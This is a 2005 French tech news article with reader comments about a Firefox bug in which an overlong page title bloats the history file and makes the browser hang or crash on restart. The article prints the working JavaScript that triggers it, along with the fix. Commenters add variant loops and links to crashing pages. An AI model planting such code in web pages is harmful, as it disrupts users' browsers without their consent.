Catégories:

Un code pour faire planter son Firefox [MAJ]

David Civera
Vendredi 9 décembre 2005 à 17:56 par David Civera
Source: Neowin.net – Mots-clés : Firefox
Catégories : Internet et réseau

Alors que le navigateur frappé d’un panda roux et connu pour être plus sûr que son homologue de Redmond, une faille vient d’être découvert touchant ainsi tout spécialement le logiciel de la fondation MozillaFondation qui dirige des projets open source, principalement Firefox et Thunderbird. Mozilla est à l'origine le surnom donné à Netscape Navigator, ....

Certes, ce n’est pas une faille de sécurité et personne ne devrait prendre le contrôle de votre machine pour l’instant, même si certains le prédisent, mais ce genre d’incident est assez rare sur Firefox pour qu’on en parle. Le code, que vous trouverez en bas de cette actualité a pour but de créer un sujet pour page Web extrêmement long qui apparaîtra en parti sur l’onglet de la page visionné. Sur le moment, rien ne se passe, mais une fois Firefox fermé, il sera impossible de le lancer à nouveau sans qu’il crash. Bref, le panda n'apprécie vraiment pas les titres trop long.

Sachez que pour résoudre le problème, il vous suffit d’effacer le fichier « history.dat » présent dans le répertoire Documents and Settings\(user)\Application Data\Mozilla\Firefox\(votre profile).

  • Exemple de code pouvant bloquer Firefox :

script type="text/javascript"

function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}

/script

Pour information, sachez que cette faille touche aussi les linuxiens.

Mise à jour : Mozilla a annoncé sortir un patchMise à jour d'un logiciel qui prend la forme d'un fichier de petite taille facile à télécharger. Un patch concerne généralement un domaine bien délimi... l'année prochaine pour corriger ce bug

Annonces Google
Commentaires

Daiyam 09/12/2005 18:09
Daiyam
Comme toujours, j'ai essayé cette faille. Et elle ne marche pas chez moi.
David Civera 09/12/2005 18:13
David Civera
Tu as cliquer sur le lien? tu as fermé Firefox? parced qu'en tout cas elle marche sur tous les pc de la redac ;)
Roro2003 09/12/2005 18:16
Roro2003
Oui, firefox se bloque mais le processus tourne tjs à 50% (en fait 100% pour les proco mono core [:grut])

ps 50% sur un dual-core
Dav' 09/12/2005 18:41
Dav&#039;
Faudrait voir à pas confondre "bug" et "faille".
A moins que l'utilisation du terme "faille" est soit là à but de sensationnalisme voici-match...
marsien 09/12/2005 18:46
marsien
a écrit :

Faudrait voir à pas confondre "bug" et "faille".
A moins que l'utilisation du terme "faille" est là à but de sensationnalisme voici-match...



+1 :jap:
golum666 09/12/2005 18:57
golum666
a écrit :

Comme toujours, j'ai essayé cette faille. Et elle ne marche pas chez moi.




comme quoi ... la greffe de doigts .... ben ca marche pas encore parfaitement !!!

:hello:
futec 09/12/2005 18:58
futec
C'est pas un panda roux... c'est un renard... à moins que ce soit moi qui me trompe :whistle:
Roro2003 09/12/2005 19:00
Roro2003
A non on va pas encore recommencer avec renard/panda
un firefox c'est un panda :o [:matleflou]
http://fr.wikipedia.org/wiki/Mozilla_Firefox
Et là
http://www.mozilla.org/projects/fi [...] e-faq.html
Citation :What's a Firefox?

A "Firefox" is another name for the red panda.
cantabile 09/12/2005 19:02
cantabile
On peut voir quelques détails là : http://www.frsirt.com/exploits/20050922.PwnZilla.php
Il faut attendre un petit peu pour que ça marche : si on clique sur le lien et qu'on ferme le navigateur en deux ou trois secondes, il redémarre correctement.
jay113 09/12/2005 19:13
jay113
Pour éviter ce genre de faille, y a l'extension NoScript :
http://extensions.geckozone.org/NoScript
Ca évite un bon nombre de failles de sécurité potentielles. On met du temps à le configurer, mais ca vaut le coup.
xam 09/12/2005 19:24
xam
Ca ne le plante pas ! Attendez 10 minutes et Firefox sera de nouveau utilisable, c'est le temps de traiter le titre et basta.
ultrabill 09/12/2005 19:24
ultrabill
a écrit :

C'est pas un panda roux... c'est un renard... à moins que ce soit moi qui me trompe :whistle:


ben ouais [:spamafote]
Yannick G 09/12/2005 19:34
Yannick G
a écrit :

Pour éviter ce genre de faille, y a l'extension NoScript :
http://extensions.geckozone.org/NoScript
Ca évite un bon nombre de failles de sécurité potentielles. On met du temps à le configurer, mais ca vaut le coup.




Y a Lynx aussi :o

[:war78]
Aiolizator 09/12/2005 20:12
Aiolizator
a écrit :

Comme toujours, j'ai essayé cette faille. Et elle ne marche pas chez moi.




Pareil chez moi, Firefox est "à l'ouest" pendant quelques secondes (100% de CPU occupé) et puis retour à la normale, mais pas l'ombre d'un plantage (et je réponds par anticipation aux questions: oui je sais cliquer, et oui je sais me servir d'un PC :D ).
lonestar 09/12/2005 20:19
lonestar
pareil :o ça mouline puis ça passe
yoconono 09/12/2005 20:23
yoconono
Citation : script type="text/javascript"

function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}



Depuis quand 2 boucles "à la con" peuvent faire planter un softs ?. La gestion des chaines de caractères doit avoir un pb d'implémentation p-ê mais moi je vous fait un code qui "plante" tous les navigateurs si vous voulez

Code :
var buffer = "";
var buffer2 = "";
for (var i = 0; i < 50000; i++) {
buffer += "A";
for (i = 0; i < 50000; i++) {
buffer2 += buffer;
}
}
inches 09/12/2005 20:27
inches
Pkoi appeler un "panda rouge" "renard de feu" ??? o_O
inches 09/12/2005 20:30
inches
dsl, j'ai vu sur wikipedia: http://fr.wikipedia.org/wiki/Panda_rouge
c'est le surnom qu'on lui a donné, bien que ce soit bien un animal de la famille de l'Ours donc du Panda ;)
mike56w 09/12/2005 20:37
mike56w
Peut etre que cette faille sera dans les prochaines mis a jour de Windows...
ChD 09/12/2005 20:38
ChD
Absolument aucun plantage chez moi non plus.
Effectivement, Firefox est très long à redémarrer. En fait, le temps de traiter le fichier history.dat qui fait 10 Mo au lieu de 380 ko.

A moins qu'avec un titre encore plus long, il plante vraiment, pour moi, ce n'est ni une faille, ni un bug.
La seule "correction" qu'ils pourraient apporter serait de limiter la longueur des titres :(
Guiwiz 09/12/2005 20:39
Guiwiz
Ce bug ne fait pas planter firefox chez moi non plus
kervern 09/12/2005 21:04
kervern
pareil pas de plantage !
rien mme 30 secondes apres !

bohmid@IDN a écrit :

dsl, j'ai vu sur wikipedia: http://fr.wikipedia.org/wiki/Panda_rouge
c'est le surnom qu'on lui a donné, bien que ce soit bien un animal de la famille de l'Ours donc du Panda ;)




chez présence pc c est des ours mal léché et on aime sa donc aime tous ce qu ia rapport au panda/ours :D
nedurb 09/12/2005 21:09
nedurb
ouais ba je confirme, ça plante pas, ça met juste du temps à démarrer
Roro2003 09/12/2005 21:12
Roro2003
Ouais ça rame 15sec et après ça marche, ça pompe juste 80mo de ram [:grut]
fourbe 09/12/2005 21:32
fourbe
moi ca plante pas du tout, j'ai un sablier a peine le temps de voir que j'ai cliqué et apres ca me charge le titre de la page "AAAAAAAAAAAAAAA..."
Pas de pb chez...
xam 09/12/2005 21:40
xam
Il faut redemarrer FF après. ;)
casimir59 09/12/2005 22:13
casimir59
T'ain ça fait planter mon Mozilla :jap: .

Sinon, euh, ca sert à quoi ce code, si ce n'est pour "embéter" le petit monde des utilisateurs du navigateur de la fondation Mozilla :??: :
-qu'un webmaster s'assure que seul "ie" puisse accéder à ses pages web ? (s'il veut diminuer la fréquentation de son site, pourquoi pas :lol: .)
-que les sites "powered by M$" (et donc M$) fassent tout pour obliger les consommateurs du web à utiliser "ie" ?
-et sinon, sous Opera, Safari et Cie, ils fonctionnent ou des plantages sont survenus :??: .

En tout cas si un site avait la bonne idée de publier un ou des codes qui fasse planter "ie", ce serait pas mal :ange: .
makina-galaxy 09/12/2005 22:21
makina-galaxy
Heureusement que l'année prochaine c'est pas dans longtemps. Bon je sais c'est pas une faille critique, mais la fondation est réputée pour la rapidité de la correction de ses bugs ;)
crochuloz 09/12/2005 22:41
crochuloz
Bonsoir, j'ai trouvé un autre site qui fait planter Firefox, en effet, essayez ceci:
http://medlem.jubii.dk/capucine/ma [...] e%20s.html
Incroyable, non?
:jap: :jap: :jap:
Blastm 09/12/2005 22:51
Blastm
l'année prochaine?
ben mince, moi qui pensais avoir l'occasion de voire leur nouveaux systeme de maj l33t qui tue a l'oeuvre rapidement :D
nedurb 09/12/2005 23:01
nedurb
fiumorbo a écrit :

moi ca plante pas du tout, j'ai un sablier a peine le temps de voir que j'ai cliqué et apres ca me charge le titre de la page "AAAAAAAAAAAAAAA..."
Pas de pb chez...





heu oui, ça c'est normal, le "plantage" a lieu au redémarrage de firefox
Dagobert_78 09/12/2005 23:16
Dagobert_78
Sans vouloir être désagréable, à quoi sert leur système de mise à jour par fichiers binaires, si ce n'est à corriger rapidement des erreurs dans leur programme ?
KangOl 09/12/2005 23:30
KangOl
et ils n'ont pas droits a des vacances ?
squall 10/12/2005 00:05
squall
a écrit :

Alors que le navigateur frappé d’un panda roux et connu pour être plus sûr que son homologue de Redmond, une faille vient d’être découvert touchant ainsi... Un code pour faire planter son Firefox [MAJ] : lire la suite



La traduction exacte de Firefox est peut etre panda roux (l'animal en peluche que vend d'ailleurs la Mozilla Corp sur leur site) mais le logo represente en renard enflamme. Les developpeurs ne connaissaient pas l'existence du panda roux lorsqu'ils ont nomme leur logiciel.
Blastm 10/12/2005 00:18
Blastm
bah, y a une faq sur leur site la dessus, vu qu'on en parle a chaque sujet sur firefox on s'attendrais a en avoir marre depuis le temps, mais faut croire que non...
remarque, après phoenix et firebird, y on pris la premiere marque non déposée qui passais par la, y on cherché qu'ensuite ce que ca voulais dire, surement :D
poncet 10/12/2005 08:48
poncet
a écrit :

Comme toujours, j'ai essayé cette faille. Et elle ne marche pas chez moi.




J'ai essayé avec Safari, ça ne plante pas non plus.
christophe_d13 10/12/2005 08:49
christophe_d13
yocono>Y a plus simple...
Code :while (1);
ultrabill 10/12/2005 08:50
ultrabill
bohmid@IDN a écrit :

Pkoi appeler un "panda rouge" "renard de feu" ??? o_O


pourquoi appeler "lion de mer" un gros phoque o_O ... => [:spamafote]
poncet 10/12/2005 08:55
poncet
a écrit :

Faudrait voir à pas confondre "bug" et "faille".
A moins que l'utilisation du terme "faille" est soit là à but de sensationnalisme voici-match...




Je dirais plutôt que ça vient de http://www.futura-sciences.com/new [...] 5_7776.php

Ce site révèle régulièrement des "failles de sécurité", toujours présentées comme potentiellement très graves, et qui démontreraient par leur existence que l'open-source n'est pas plus fiable que Windows.

Je n'irai pas jusqu'à affirmer que l'Oréal et Microsoft ont des relations étroites, mais on se demande quand même...
marsien 10/12/2005 09:38
marsien
MagiC-BretzeL a écrit :

Je dirais plutôt que ça vient de http://www.futura-sciences.com/new [...] 5_7776.php

Ce site révèle régulièrement des "failles de sécurité", toujours présentées comme potentiellement très graves, et qui démontreraient par leur existence que l'open-source n'est pas plus fiable que Windows.

Je n'irai pas jusqu'à affirmer que l'Oréal et Microsoft ont des relations étroites, mais on se demande quand même...



Je me suis dit en lisant ton post que tu étais sans doute encore un fervent défenseur du libre, prêt à affirmer n'importe quoi dès qu'on touche à ses joyaux. Ben, je m'excuse !

En lisant l'article de futura-sciences, c'est choquant de voir un tel parti pris ; par ex, réduire Firefox aux plateformes Windows et MacOS, en "oubliant" Linux, c'est vraiment n'importe quoi... Futura-sciences, info subjective ? Jusqu'à preuve du contraire je répondrais oui.

Et pour le moment, il s'agit bien d'un bug, et non d'une faille... [:spamafote]
ultrabill 10/12/2005 10:01
ultrabill
marsien > Ils ne parlent pas non plus des version OS/2, Solaris, BeOS, RiscOS ... Les versions les moins utilisées, quoi [:spamafote]
oulien 10/12/2005 10:53
oulien
mon firefox est mort, MERCI PPC, je ne peux rien faire, ni le safe mode, ni meme une reinstallation. rien ne marche, et revoila IE, je suis dégouté, suis je le seul? j'ouvre une fenetre qui plante des son apparition, ceci n'était jamais arrivé avant que je clic sur vore lien...
neomikron 10/12/2005 10:53
neomikron
tyrese a écrit :

La traduction exacte de Firefox est peut etre panda roux (l'animal en peluche que vend d'ailleurs la Mozilla Corp sur leur site) mais le logo represente en renard enflamme. Les developpeurs ne connaissaient pas l'existence du panda roux lorsqu'ils ont nomme leur logiciel.




ouai c'est clair, si firefox c'était le surnom d'une opération de l'armée américaine y'aurait déjà les psychoteurs qui auraient fait le rapprochement entre les convictions de bush et des dev de ff...

on s'en fout que firefox ça soit le nom d'une espèce de panda, firefox littéralement = renard de feu, tiens ça tombe bien le logo c'est un renard rouge basta -_-

sinon oui le terme faille est pas très approprié je pense, surtout vu le nombre de posteurs qui disent déjà que ça ne fait en rien planter (et quand bien même ça ferait planter ça serait + un bug qu'une faille) et que la gestion du trucs est même dans la plupart des cas transparente.
neomikron 10/12/2005 10:55
neomikron
bluerabbit@IDN a écrit :

mon firefox est mort, MERCI PPC, je ne peux rien faire, ni le safe mode, ni meme une reinstallation. rien ne marche, et revoila IE, je suis dégouté, suis je le seul? j'ouvre une fenetre qui plante des son apparition, ceci n'était jamais arrivé avant que je clic sur vore lien...




:lol:
il en fallait au moins un pour que les autres comprennent que c'est bilou qui a hacké ppc pour poster cette news et descendre les utilisateurs de ff... :whistle:
et l'history.dat ça fait rien :??:
oulien 10/12/2005 11:00
oulien
Je n'arrive a rien faire depuis hier, quelqu'un a t'il une solution a me proposer?
KangOl 10/12/2005 11:02
KangOl
lire la news en entier ?
makina-galaxy 10/12/2005 11:05
makina-galaxy
Ben la solution c'est de faire ce qui est dit dans la news :

"Sachez que pour résoudre le problème, il vous suffit d’effacer le fichier « history.dat » présent dans le répertoire Documents and Settings\(user)\Application Data\Mozilla\Firefox\(votre profile)."

Sinon pour l'éternel débat sur le nom, ben ils on sans doute remplacé simplement bird par fox...
oulien 10/12/2005 11:06
oulien
quelqu'un a t'il une solution non comique pour m'aider? merci bcp
marsien 10/12/2005 11:08